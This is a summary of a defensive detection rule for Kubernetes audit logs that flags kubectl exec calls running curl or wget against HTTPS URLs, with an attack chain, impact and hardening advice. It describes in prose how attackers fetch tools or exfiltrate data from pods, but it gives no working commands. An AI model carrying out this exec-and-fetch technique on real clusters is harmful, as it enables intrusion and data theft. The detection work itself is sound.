Kubernetes Pod Exec with Curl or Wget to HTTPS

This detection rule identifies suspicious activity within Kubernetes environments where attackers leverage kubectl exec or similar API calls to execute commands within pods. Specifically, it focuses on instances where these commands involve using curl or wget to retrieve content over HTTPS. Attackers may use this technique to download malicious scripts, tools, or exfiltrate sensitive data from compromised pods. This activity is flagged based on decoded request URIs from Kubernetes audit logs, reconstructed command strings, and filtering of benign traffic related to cluster health checks and OIDC/JWKS endpoints. The rule aims to detect anomalous behavior that deviates from typical pod execution patterns, helping defenders identify potential intrusions or misuse of pod execution privileges. The rule was created on 2026/04/23 and last updated on 2026/04/23 according to the source.

Attack Chain

1. An attacker gains unauthorized access to the Kubernetes cluster, possibly through compromised credentials or a vulnerability.
2. The attacker identifies a target pod within the cluster to execute commands within.
3. The attacker uses kubectl exec or a similar API call to initiate a shell session within the target pod.
4. The attacker crafts a command using curl or wget to download a malicious script, tool, or exfiltrate data over HTTPS. The URL is often encoded in the requestURI.
5. The Kubernetes API server records the exec call and its parameters in the audit logs.
6. The detection rule decodes the requestURI, extracts the command string, and identifies the use of curl or wget with an HTTPS URL.
7. The rule filters out known benign URLs associated with cluster health checks or OIDC/JWKS endpoints.
8. If the command is identified as malicious, an alert is triggered, indicating a potential compromise.

Impact

Successful exploitation can lead to the deployment of malicious tools within the Kubernetes environment, potentially enabling lateral movement, data theft, or denial-of-service attacks. Compromised pods could expose sensitive data or be used as a launchpad for further attacks on the cluster or other systems. The scope of impact depends on the permissions granted to the compromised pod and the attacker’s objectives.

Recommendation

• Deploy the Sigma rule “Kubernetes Pod Exec with Curl or Wget to HTTPS” to your SIEM and tune for your environment.
• Review Kubernetes RoleBindings for pods/exec to ensure only required principals retain access on sensitive namespaces.
• Investigate any alerts generated by the Sigma rule by reviewing the decoded URI and reconstructed command in the alert details.
• Implement network policies to restrict egress traffic from pods, limiting the potential for data exfiltration via HTTPS.
• Regularly audit Kubernetes audit logs for suspicious activity related to pod execution and API calls.